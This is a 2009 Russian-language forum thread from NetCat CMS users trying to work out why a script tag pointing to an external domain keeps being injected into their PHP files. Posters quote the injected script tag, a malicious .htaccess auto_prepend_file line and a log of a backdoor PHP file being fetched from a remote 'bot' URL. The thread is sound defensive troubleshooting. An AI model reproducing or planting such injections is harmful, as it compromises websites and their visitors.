Регистрация
Вход через соцсети
Восстановление пароля

внедрение в vars.inc.php ссылки на троян

Новый топик
01.07.2009, 18:42
Ответить | Цитировать
Balu
Котлевец Владислав

Зарегистрирован:
2009-03-12
Сообщений: 14

Возвращаюсь к похожей теме.
Ситуация как в предыдущем посте. Тоже периодически либо в файле vars.inc.php, либо в sql_mysql.php в конец дописывается ссылка вида <script src=http://flo4.biz/1.txt></script>
Компьютер был проверен на вирус касперским.
Система сначала была обновлена до 3.52, потом просто снесена и поставлена заново, и влита старая база. Не помогло. Так же не помогла замена паролей на ftp, да и просто блокировка доступа к сайту по ftp. Зарезание всех прав на доступ к файлам тоже не помог.
Есть ощущение, что заражение происходит при обращении к какой-то странице на сайте, уж слишком нерегулярно оно происходит, чаще в пиковые часы посещаемости.
Уже, честно говоря, не знаю, где искать...

ebugen
02.07.2009, 09:47
Ответить | Цитировать
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

Посмотрите через SSH все процессы от вашего юзера через команду top. Если какие-то процессы не понятны, то нажимаете на k (kill) вводите PID процесса и убиваете его.

У моего клиента была похожая хрень. Я все файлы с сайта удалял, а вирусняк сидел.. в итоге как выяснилось по причине указанной выше.

Temet nosce...
02.07.2009, 13:50
Ответить | Цитировать
Balu
Котлевец Владислав

Зарегистрирован:
2009-03-12
Сообщений: 14

Команда top на мастерхосте закрыта для использования. А ps -ef никаких процессов для моего пользователя не показывает...

ebugen
02.07.2009, 15:08
Ответить | Цитировать
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

Можно еще попробывать поискать внедрение пхп скриптов в базе данных. Сталкивался с тем, что ломали БД, туда внедряли код, который выполнялся и при генерации страниц вылезал.

еще .htaccess проверьте, в последнее время замечал вот такое:
Код:

php_value auto_prepend_file /home/a/b/docs/netcat/FCKeditor/editor/plugins/placeholder/core.php


Temet nosce...
03.07.2009, 11:49
Ответить | Цитировать
MipH
Спирин Дмитрий
MipH

Зарегистрирован:
2004-12-22
Сообщений: 252

Вероятно, в процессе заражения вам на диск засунули скрипт (файл), при обращении к которому он заново может все это проделать. Найдите его.

bbzone@gmail.com | bbz.ru | miph.info | miph.ru
Вы можете обратиться ко мне, если необходима разработка функционала на NetCat
03.07.2009, 13:44
Ответить | Цитировать
Balu
Котлевец Владислав

Зарегистрирован:
2009-03-12
Сообщений: 14

Перекопал весь сервер. Не так много мест, куда можно записать такой скрипт. Причем, интересные вещи наблюдаются. Когда сайт был обновлен до верси 3.52, файлы vars.ink.php и sql_mysql.php лежали в разных папках, и в каждый из этих файлов прописывалась мусорная строка. Когда откатил систему до версии 2.4, ситуация осталась аналогичной, хотя файлы теперь лежат в одной директории. Пробовал изменять права на файлы на 004, т.е. вообще никаких прав на запись в файл. На глазах права меняются на 644 и строка все равно прописывается... Если удалить файл vars.ink.php то строка пишется в sql_mysql.php

ebugen
29.07.2009, 19:53
Ответить | Цитировать
Гость
Гость

Было примерно такое же, промотал я пароли на фтп, нашел только по логам, раза 4 чистил, ищи backdoors, смотри когда какие файлы модифицированы и т.д. на худой конец сделай backup и залей системные файлы поверх
права проверь на исполняемые файлы
30.07.2009, 18:07
Ответить | Цитировать
netcat77
Caen

Зарегистрирован:
2006-07-27
Сообщений: 1

DiGGy писал(а):
Можно еще попробывать поискать внедрение пхп скриптов в базе данных. Сталкивался с тем, что ломали БД, туда внедряли код, который выполнялся и при генерации страниц вылезал.

еще .htaccess проверьте, в последнее время замечал вот такое:
Код:

php_value auto_prepend_file /home/a/b/docs/netcat/FCKeditor/editor/plugins/placeholder/core.php


Аналогичная проблема. Самое интересное, что FTP у меня закрыт, хожу по SSH, но по логам удалось выяснить, что внедрение этой гадости было сделано и без его помощи. Хостер Ру-Центр, отнеслись с пониманием, помогли поднять все логи, следы остались только в error.log. Вот фрагмент -

--17:53:49-- http://z111601.infobox.ru/bot/gaim2M8myV/0/data.php
=> `/home/***/***.ru/docs/netcat_files/70/72/data.php'
Resolving z111601.infobox.ru... 77.221.130.28
Connecting to z111601.infobox.ru|77.221.130.28|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

0K ..... 196.56 KB/s

17:53:49 (196.56 KB/s) - `/home/***/***.ru/docs/netcat_files/70/72/data.php' saved [5214]

Давайте попробуем разобраться - кто виноват. Разработчики, примите тоже участие. У меня за семь лет - это первый случай. Причем сломали сайты и на стандарте и на комунити.

pushkino
30.07.2009, 21:24
Ответить | Цитировать
VlastV
qb.digital

Зарегистрирован:
2005-11-02
Сообщений: 202

Возможно на сайте есть форма к которой можно прикрепить файл. Формат у этого поля не заполнен.

Разработка сайтов на CMS NetCat. Портфолио http://vlastv.ru/ E-mail: me [at] vlastv [dot] ru ; ICQ: 66117050
198 196 2009-07-30 21:24:32 7742
Описание проекта